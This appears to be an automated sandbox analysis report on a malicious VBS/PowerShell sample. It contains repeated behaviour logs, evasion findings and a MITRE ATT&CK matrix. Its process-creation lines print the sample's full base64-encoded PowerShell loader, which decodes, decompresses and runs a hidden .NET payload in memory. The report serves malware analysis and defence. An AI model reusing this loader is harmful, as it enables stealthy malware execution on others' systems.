Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Powershell is started from unusual location (likely to bypass HIPS)
Source: c:\users\user\desktop\8820_715_scan.vbs.exeKey value queried: Powershell behaviorJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeMemory allocated: 8580000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeWindow / User API: threadDelayed 4699Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeWindow / User API: threadDelayed 1622Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe TID: 4308Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe TID: 4580Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "c:\users\user\desktop\8820_715_scan.vbs.exe" -enc jabjagcabwb0agyabwbhagmaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqaqgb1ahaababzahmazgbnagmaegagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaekazwbvahqazgbvageaywagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabvagmaagbxahkadqblaguaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqaqgb1ahaababzahmazgbnagmaegauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqaqwbkag0adabxaheadgb3ag0aagagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqavqbjagoacqb5ahuazqblacaakqa7acqaqwb1ag0ayqbxahkaagbtacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabhahuaegbwagiazwbwacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakaemazabtahqacqbxahyadwbtagoalaagacgawwbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbdag8abqbwahiazqbzahmaaqbvag4atqbvagqazqbdadoaogbeaguaywbvag0acabyaguacwbzackaowakaecadqb6ahaaygbnahaalgbdag8acab5afqabwaoacaajabdahuabqbhaheaeqbqag0aiaapadsajabhahuaegbwagiazwbwac4aqwbsag8acwblacgakqa7acqaqwbkag0adabxaheadgb3ag0aagauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafuaywbqaheaeqb1aguazqagad0aiaakaemadqbtageacqb5agoabqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqavqbjagoacqb5ahuazqblackaowagacqarqb6ahgacabnahoabgboahyaegbqacaapqagafsauwb5ahmadablag0algbuaggacgblageazabpag4azwauafqaaabyaguayqbkaf0aoga6aecazqb0aeqabwbtageaaqbuacgakqauaewabwbhagqakaakafuaywbqaheaeqb1aguazqapadsaiaakaeqacwbwahcadaagad0aiaakaeuaegb4ahaazwb6ag4aaab2ahoaagauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqacwbwahcadaauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabzahaadwb0ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\8820_715_SCAN.vbs.exe "c:\users\user\desktop\8820_715_scan.vbs.exe" -enc jabjagcabwb0agyabwbhagmaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqaqgb1ahaababzahmazgbnagmaegagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaekazwbvahqazgbvageaywagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabvagmaagbxahkadqblaguaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqaqgb1ahaababzahmazgbnagmaegauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqaqwbkag0adabxaheadgb3ag0aagagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqavqbjagoacqb5ahuazqblacaakqa7acqaqwb1ag0ayqbxahkaagbtacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabhahuaegbwagiazwbwacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakaemazabtahqacqbxahyadwbtagoalaagacgawwbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbdag8abqbwahiazqbzahmaaqbvag4atqbvagqazqbdadoaogbeaguaywbvag0acabyaguacwbzackaowakaecadqb6ahaaygbnahaalgbdag8acab5afqabwaoacaajabdahuabqbhaheaeqbqag0aiaapadsajabhahuaegbwagiazwbwac4aqwbsag8acwblacgakqa7acqaqwbkag0adabxaheadgb3ag0aagauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafuaywbqaheaeqb1aguazqagad0aiaakaemadqbtageacqb5agoabqauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqavqbjagoacqb5ahuazqblackaowagacqarqb6ahgacabnahoabgboahyaegbqacaapqagafsauwb5ahmadablag0algbuaggacgblageazabpag4azwauafqaaabyaguayqbkaf0aoga6aecazqb0aeqabwbtageaaqbuacgakqauaewabwbhagqakaakafuaywbqaheaeqb1aguazqapadsaiaakaeqacwbwahcadaagad0aiaakaeuaegb4ahaazwb6ag4aaab2ahoaagauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqacwbwahcadaauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabzahaadwb0ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==Jump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\8820_715_SCAN.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information21
Scripting		Valid Accounts11
Windows Management Instrumentation		21
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory31
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets13
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
